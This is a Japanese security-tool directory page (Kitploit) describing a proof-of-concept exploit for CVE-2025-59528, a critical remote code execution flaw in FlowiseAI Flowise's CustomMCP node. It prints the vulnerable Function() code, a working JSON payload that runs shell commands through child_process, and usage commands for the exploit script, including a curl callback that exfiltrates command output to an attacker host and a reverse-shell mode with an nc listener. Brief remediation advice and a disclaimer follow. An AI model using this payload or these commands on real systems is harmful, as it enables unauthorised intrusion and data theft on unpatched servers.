Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-59528-POC — CVE-2025-59528 - FlowiseAI CustomMCP リモートコード実行 | Kitploit
ツール/GitHubGitHub/usifaraby/cve-2025-59528-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育リモートアクセスツールペイロード開発
GitHubusifaraby/cve-2025-59528-poc

CVE-2025-59528-POC

CVE-2025-59528 - FlowiseAI CustomMCP リモートコード実行

リポジトリを見る
14ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-59528 - FlowiseAI CustomMCP リモートコード実行

CVSS 10.0(重大) | Blind RCE | FlowiseAI Flowise >= 2.2.7-patch.1 かつ < 3.0.6

概要

CustomMCPノードにおける重大なリモートコード実行脆弱性。FlowiseAI FlowiseのconvertToValidJSONString関数は、mcpServerConfigパラメータから提供されたユーザー入力を、JavaScriptのFunction()コンストラクタ(機能的にはeval()と同等)に直接渡すため、Node.jsランタイムの全権限で任意のJavaScriptコードの実行が可能になります。

  • 発見者: Kim SooHyun (@im-soohyun)
  • アドバイザリ: GHSA-3gcm-f6qx-ff7p
  • 修正バージョン: Flowise v3.0.6(Function()をJSON5.parse()に置き換え)

脆弱なコード

packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.tsの262~270行目:

root@kitploit:~
function convertToValidJSONString(inputString) {
    return Function('return ' + inputString)();  // ← arbitrary code execution
}

汚染フロー:

root@kitploit:~
HTTP POST → /api/v1/node-load-method/customMCP
  → controller.getSingleNodeAsyncOptions()
    → service layer
      → CustomMCP.listActions()
        → convertToValidJSONString(mcpServerConfig)  // Function('return ' + userInput)()

悪用

これはBlind RCEであり、コマンド出力はHTTPレスポンスに反映されません。コールバック技術(curl/wget)やリバースシェルを使用して実行を確認してください。

必要条件

条件詳細
Flowise バージョン>= 2.2.7-patch.1, < 3.0.6
ネットワークアクセスAPIエンドポイント(ポート3000、デフォルト)
認証3.0.1未満では任意、3.0.1以上では必須

ペイロード

root@kitploit:~
{
  "loadMethod": "listActions",
  "inputs": {
    "mcpServerConfig": "{x:(function(){const cp=process.mainModule.require('child_process');cp.exec('COMMAND',()=>{});return 1;})()}"
  }
}

使用方法

root@kitploit:~
pip install requests

ターゲットが脆弱か確認(時間ベース)

root@kitploit:~
python3 exploit.py -t http://target:3000 --mode check --email [email protected] --password pass

Blindコマンド実行

root@kitploit:~
# Exfiltrate output via callback
python3 exploit.py -t http://target:3000 --mode exec \
  -c "curl http://ATTACKER:PORT/\$(id | base64)" \
  --email [email protected] --password pass

リバースシェル

root@kitploit:~
# Start listener
nc -lvnp 4444

# Fire exploit (auto-tries bash, nc, python)
python3 exploit.py -t http://target:3000 --mode revshell \
  --lhost ATTACKER_IP --lport 4444 \
  --email [email protected] --password pass

認証オプション

root@kitploit:~
# JWT auth (Flowise >= 3.0.1)
--email [email protected] --password pass

# Basic auth (Flowise < 3.0.1 with FLOWISE_USERNAME env)
--username admin --password pass

# Raw cookie string (fallback)
--cookie "token=eyJ...;refreshToken=eyJ...;connect.sid=s%3A..."

修正策

  • アップグレード:Flowise >= 3.0.6へ
  • 制限:ファイアウォール/VPNによるAPIアクセス制限
  • 有効化:すべてのインスタンスで認証を有効化
  • 監視:/api/v1/node-load-method/customMCPへのPOSTリクエストをログ監視

参照

  • NVD — CVE-2025-59528
  • GitHub Advisory — GHSA-3gcm-f6qx-ff7p
  • SonicWall脅威分析
  • 修正コミット — Flowise v3.0.6

免責事項

このツールは、認可されたセキュリティテストおよび教育目的のみで提供されます。コンピュータシステムへの不正アクセスは違法です。テスト前に必ず適切な許可を得てください。

ツールをダウンロード